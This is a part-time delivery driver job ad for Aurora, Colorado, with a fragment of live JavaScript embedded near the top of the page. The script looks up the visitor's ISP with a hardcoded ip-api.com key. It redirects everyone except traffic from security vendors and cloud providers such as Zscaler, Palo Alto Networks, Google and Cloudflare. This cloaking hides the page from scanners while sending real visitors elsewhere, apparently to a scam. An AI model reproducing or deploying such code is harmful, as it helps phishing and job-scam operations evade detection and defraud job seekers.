Logistics/Customer Service Delivery Driver – Part Time
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable Part-Time Logistics/Customer Service Delivery Driver in Aurora, Colorado.
Responsibilities:
- Safely deliver packages to customers within designated areas, ensuring timely and accurate deliveries.
- Provide excellent customer service by addressing inquiries and ensuring customer satisfaction.
- Verify delivery details and obtain signatures as required.
- Maintain vehicle cleanliness and report any vehicle issues promptly.
- Follow all safety protocols and traffic laws during deliveries.
- Assist with loading and unloading parcels as needed.
Skills Needed:
- Strong organizational and time management skills.
- Excellent communication and interpersonal skills.
- Ability to work independently and handle multiple deliveries efficiently.
- Valid driver’s license with a clean driving record.
- Basic navigation skills using GPS or maps.
Benefits: Competitive hourly pay, flexible schedule, training provided, and a supportive team environment.